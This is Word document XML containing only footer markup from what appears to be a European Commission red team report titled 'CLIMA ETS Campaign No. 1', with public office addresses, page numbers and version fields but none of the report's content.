      <w:p w14:paraId="7E1B2C02" w14:textId="2F1CEDEB" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="1582098485"/>
            <w:dataBinding w:xpath="/Author/Addresses/Address[Id = 'f03b5801-04c9-4931-aa17-c6d6c70bc579']/Footer" w:storeItemID="{F68B380E-6E4C-46B9-9B35-227E84EF5D65}"/>
            <w:text w:multiLine="1"/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t xml:space="preserve">Commission </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>européenne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>Europese</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>Commissie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t xml:space="preserve">, 1049 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>Bruxelles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>/Brussel, BELGIQUE/BELGIË – Tel. +32 22991111</w:t>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:p>
      <w:p w14:paraId="737434D8" w14:textId="77777777" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00B01C17">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
      </w:p>
      <w:p w14:paraId="73D78AFC" w14:textId="67070A57" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-1500417410"/>
            <w:dataBinding w:xpath="/Author/Addresses/Address[Id = '1264fb81-f6bb-475e-9f9d-a937d3be6ee2']/Footer" w:storeItemID="{F68B380E-6E4C-46B9-9B35-227E84EF5D65}"/>
            <w:text w:multiLine="1"/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t xml:space="preserve">Commission </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>européenne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
              <w:t>, 2920 Luxembourg, LUXEMBOURG – Tel. +352 43011</w:t>
            </w:r>
          </w:sdtContent>
        </w:sdt>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C381" w14:textId="77777777" w:rsidR="003C7E89" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="006016FE">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="8732"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:right="0"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w:tag w:val=""/>
        <w:id w:val="-1337295754"/>
        <w:placeholder>
          <w:docPart w:val="840203C9FF1F4043A3483346FA2871B0"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
          <w:t>Red Team Report</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> – </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Subject"/>
        <w:tag w:val=""/>
        <w:id w:val="234905373"/>
        <w:placeholder>
          <w:docPart w:val="DE072181A0894D9B8A95B6EAD01EDF83"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
          <w:t>CLIMA ETS Campaign No. 1</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t>58</w:t>
    </w:r>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="0A399B52" w14:textId="4F31FCDB" w:rsidR="006720BF" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="003C7E89">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="954368242"/>
        <w:dataBinding w:xpath="/Texts/TechFooterVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
          <w:t>Document Version</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Version"/>
        <w:id w:val="522288913"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>1.0</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="127978525"/>
        <w:dataBinding w:xpath="/Texts/TechFooterDated" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
          <w:t>dated</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="003C7E89" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val=""/>
        <w:id w:val="-441690248"/>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5088" w14:textId="77777777" w:rsidR="00382BC6" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00382BC6">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="14855"/>
      </w:tabs>
      <w:ind w:right="-59"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w:tag w:val=""/>
        <w:id w:val="2119566386"/>
        <w:placeholder>
          <w:docPart w:val="B33DE9DFB7F543D8B244F6B2BD1AAD37"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
          <w:t>Red Team Report</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> – </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Subject"/>
        <w:tag w:val=""/>
        <w:id w:val="1133601515"/>
        <w:placeholder>
          <w:docPart w:val="1EFB02F20A3F4605ADB69E0325D6D5F2"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
          <w:t>CLIMA ETS Campaign No. 1</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="355E4D32" w14:textId="122E3C81" w:rsidR="00382BC6" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="784000389"/>
        <w:dataBinding w:xpath="/Texts/TechFooterVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
          <w:t>Document Version</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Version"/>
        <w:id w:val="-2034409270"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>1.0</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-2007735402"/>
        <w:dataBinding w:xpath="/Texts/TechFooterDated" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
          <w:t>dated</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val=""/>
        <w:id w:val="-880702260"/>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87C4" w14:textId="57A3EFA9" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="007377A9">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="14742"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:right="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w:tag w:val=""/>
        <w:id w:val="-1839068223"/>
        <w:placeholder>
          <w:docPart w:val="746D911518154AEC8B1C27992CFA98B0"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
          <w:t>Red Team Report</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> – </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Subject"/>
        <w:tag w:val=""/>
        <w:id w:val="1152564580"/>
        <w:placeholder>
          <w:docPart w:val="3A023E704D8E4DD79D71542E755B3DE1"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
          <w:t>CLIMA ETS Campaign No. 1</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00382BC6" w:rsidRPr="001019D3">
      <w:tab/>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t>58</w:t>
    </w:r>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="60272372" w14:textId="1BBCF677" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="003C7E89">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="205377212"/>
        <w:dataBinding w:xpath="/Texts/TechFooterVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
          <w:t>Document Version</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Version"/>
        <w:id w:val="1791249164"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>1.0</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1686557468"/>
        <w:dataBinding w:xpath="/Texts/TechFooterDated" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
          <w:t>dated</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="006D2C8C" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val=""/>
        <w:id w:val="795186657"/>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D57A" w14:textId="77777777" w:rsidR="00DA165B" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00DA165B">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="8730"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:right="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w:tag w:val=""/>
        <w:id w:val="-1094314753"/>
        <w:placeholder>
          <w:docPart w:val="3FBE7E18E9C64B3D8D6586CE3A6E6447"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>Red Team Report</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> – </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Subject"/>
        <w:tag w:val=""/>
        <w:id w:val="-1076896700"/>
        <w:placeholder>
          <w:docPart w:val="3A94583CAF5141B3A842DC56EC8FC38D"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>CLIMA ETS Campaign No. 1</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t>55</w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t>62</w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="205514CF" w14:textId="437BFC9F" w:rsidR="00DA165B" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00DA165B">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1748722490"/>
        <w:dataBinding w:xpath="/Texts/TechFooterVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>Document Version</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Version"/>
        <w:id w:val="-1105269229"/>
        <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
          <w:t>1.0</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1307081563"/>
        <w:dataBinding w:xpath="/Texts/TechFooterDated" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>dated</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val=""/>
        <w:id w:val="354615275"/>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1D6D" w14:textId="77777777" w:rsidR="00DA165B" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00DA165B">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="8730"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:right="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title"/>
        <w:tag w:val=""/>
        <w:id w:val="-988558221"/>
        <w:placeholder>
          <w:docPart w:val="6187112204064D41BF775EAB15DA5799"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>Red Team Report</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t xml:space="preserve"> – </w:t>
    </w:r>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Subject"/>
        <w:tag w:val=""/>
        <w:id w:val="891315896"/>
        <w:placeholder>
          <w:docPart w:val="7FDA3514B9D043F28F9E5ABD9B245C90"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
          <w:t>CLIMA ETS Campaign No. 1</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidR="00DA165B" w:rsidRPr="001019D3">
